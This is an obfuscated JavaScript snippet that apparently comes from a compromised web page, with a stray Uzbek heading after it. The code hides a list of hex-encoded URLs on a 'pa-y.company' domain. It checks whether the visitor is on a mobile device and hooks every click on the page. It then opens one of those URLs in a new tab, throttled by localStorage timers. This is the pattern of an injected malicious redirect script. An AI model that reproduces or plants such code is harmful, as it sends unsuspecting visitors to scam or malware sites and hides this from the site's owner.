function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid